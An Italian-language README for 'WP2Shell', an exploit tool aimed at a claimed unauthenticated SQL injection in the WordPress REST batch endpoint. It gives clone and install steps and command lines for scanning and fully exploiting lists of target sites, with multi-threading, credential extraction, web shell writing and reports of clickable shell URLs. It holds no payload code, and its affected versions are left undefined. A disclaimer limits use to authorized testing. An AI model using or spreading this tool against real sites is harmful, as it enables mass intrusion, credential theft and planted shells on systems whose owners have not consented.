
WP2Shell - CVE-2026-63030 / CVE-2026-60137 Questo strumento sfrutta una vulnerabilità critica di SQL injection nell'endpoint `/wp-json/batch/v1` dell'API REST di WordPress, consentendo ad attaccanti non autenticati di eseguire query SQL arbitrarie e ottenere l'esecuzione remota di codice (RCE) su installazioni WordPress vulnerabili.
Strumento completo di scoperta e sfruttamento per la vulnerabilità di SQL injection nell'endpoint Batch dell'API REST di WordPress.
Questo strumento sfrutta una vulnerabilità critica di SQL injection nell'endpoint /wp-json/batch/v1 dell'API REST di WordPress, consentendo a utenti non autenticati di eseguire query SQL arbitrarie e ottenere Remote Code Execution (RCE) su installazioni WordPress vulnerabili.
Vulnerabilità: CVE-2026-63030 / CVE-2026-60137
Vettore: SQL injection nell'endpoint Batch dell'API REST di WordPress (/wp-json/batch/v1)
Impatto: RCE non autenticata
Versioni interessate: WordPress 6.4.x e precedenti (versioni specifiche da definire)
SLEEP()ORDER BYINTO OUTFILE (quando consentito)# Clone the repository
git clone https://github.com/NULL200OK/wp2shell.git
cd wp2shell
# Install dependencies
pip install requests beautifulsoup4
# Create targets file
echo "https://target.com" > targets.txt
# Run discovery
python wp2shell.py targets.txt --scan --verbose
# Full exploitation
python wp2shell.py targets.txt --exploit --verbose
# Scan single target with verbose output
python wp2shell.py targets.txt --exploit --verbose
# Custom sleep time for slow servers
python wp2shell.py targets.txt --exploit --sleep 20 --verbose
# Multi-threaded scanning (20 threads)
python wp2shell.py targets.txt --exploit --threads 20 --verbose
# Skip shell writes (extract credentials only)
python wp2shell.py targets.txt --exploit --no-shell --verbose
# Force specific HTTP method
python wp2shell.py targets.txt --exploit --method POST --verbose
1- Report JSON: Dati strutturati con stato della vulnerabilità e credenziali estratte
2- Report HTML: Visualizzazione chiara e colorata con URL della shell cliccabili
Questo strumento è solo per scopi educativi e test autorizzati. Usalo solo su sistemi di tua proprietà o per i quali hai esplicita autorizzazione. L'autore non si assume alcuna responsabilità per un uso improprio.